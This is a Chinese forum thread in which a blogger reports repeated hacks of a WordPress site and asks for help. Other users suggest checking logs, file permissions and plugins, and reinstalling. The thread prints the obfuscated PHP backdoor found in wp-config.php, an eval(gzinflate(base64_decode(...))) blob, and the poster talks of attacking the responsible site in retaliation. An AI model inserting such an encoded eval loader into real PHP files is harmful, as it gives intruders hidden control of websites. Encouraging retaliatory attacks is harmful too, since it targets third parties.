WP是不是又有什么重大漏洞没修复？

solar

一个小博客每隔1星期被黑一次。VPS都换了3家了，全部最新版本的。。。。



wp-config.php也被注入了：

1. <?php eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSl**8b/veeQsq2gAfYQ0Tz3y/cxvJWFEUoSrqtsURLfa3UZkO/Pnw0EJz7v1Bn7JhrT+LQAdSakMDRwVgOvWJGYbOUuwAQ1VtYwo2qQFquQnF6lf00/z7I0mV2lF7P05OLy9yQNydjZe6o1m1DsGysIejkV1uLkWktl5WQvjskoIJ0Xz8uG7dIWpWrYLsCaMFCT7xtjUbJsyUxWKGmYhMZc1Wsw1cy0WhKjReWjOfqD/Pkz3h9VobEpIQOcgSfKuDG6ZNKKJp6KKcW0XGmoQUDG0YTA+St8Svx1eIiFRzGYX3tiTv4l9MB6dNk99WTWhmnGfZdTQ1RIalSp7pj2vewySf9O0uv9P2ezzzBimGyS7s9t+17DGjDPtc7vfbpUalkyGtIbIZdw3OcrpeDMm1v8qpIGXfEsh+X61jtvCJyBW4YPiWsFU9MhSiMa0WAvtisIyHaALet1tNnPz03BHuDwIbTta6HjXS9n09Or8+QCIDOdzvbnthcOnYBVRIdQV5PRqFoc+RQjcZ1XzBUPNe7ZLXfA9XhAHh6IERXzA/LSIqCyN9T8Rt6MDo6wOQfpRVkgSiwlfLoypn4/HI6PxtGr1++i8atfovHb0VAWw6UsonpVf/iP6fjL15bp+6jMDWtM9KWhO+RiPLu07sprjK5qxAsPCb0DMjn1gN9pYbCoOuzhDP1dOLCw0EaLTrK2X8S3M9gM/JG3NbWWW8PjVpZC3uIALEXsbLHv4yfo4Wy60HAtgg+7BHB7/2i/2OWeaID7oNTVWeP6W5bqJi+JE7ld4i9IOZ6g2wBFbY773SCAWjRfwS07+QOAQOeT7mmqNVtmVW6KlU+H/wi5UHfNkAIe2zwgL16QR/rzy4/Jw7RmOu+b9Cjl5g+vi9KZZrXSBrjhj9zcLCZE3cNlmpxPZ0l2cnYGFJsQB5r/Aa4Ls7jh8U/oXQBofFpFi+ieBpvHECyfQnrfNnR4fvnuzevRKNgB7hHyMRA81tt127ubt6VJt6fsdDr99DG5plnWmoprOrcz6pi+XfZT4LAJQphQQOK4e4rR15O8iPsUJ93/jAFkLJS6FdDJJl2oc7nwx+F4BK10jR3axg7ehnTY0WlQayGhWojcCXaMOu4ohYMDVuXIKl63Fr416fNJ1BF9wEmTPpvWG47A3/oH')));?>

复制代码

哪位大大分析下这是什么网站，老子攻击它去
上次查到了一个挂马的网站，直接举报+攻击到它打不开

一步一杀

VPS上还有其他站吗

solar

一步一杀 发表于 2013-3-19 00:36
找到被黑原因了吗？查查日志呢

只能去挖这个了。。。
根目录被注入生成了：
sess_9f90b1c8d2dc066344f19a1dc2e00628 文件
打开：
^[^S^S^D^X^]^D^[^X^R^D^[^Z^_V

一步一杀

找到被黑原因了吗？查查日志呢

葫芦娃

能新注册用户么

勇少

备份数据库和图片文件夹 重新安装新版本 导入。

ylsnuha

主题插件是不被修改的或有恶意代码，vps上面是不有别的站一起被黑。

东方星雨

我的WP更是离谱，在后台快捷可以发文章，在完整版那发文章，死活都发不出去，发的文章占用了ID号，可是哪都没显示，我现在打算用新的WP安装文件覆盖现在的文件试试

imtu

杯具

solar

zicca 发表于 2013-3-19 14:20
博客几年了从没被黑，小伙要低调

也就最近一个月的的事，以前也从没被黑，VPS上的安全设置基本无懈可击了，所以怀疑是WP漏洞

zicca

博客几年了从没被黑，小伙要低调

solar

xen 发表于 2013-3-19 06:49
WP-CONFIG不给644笑而不语

早设置成440了。。。。

xen

WP-CONFIG不给644笑而不语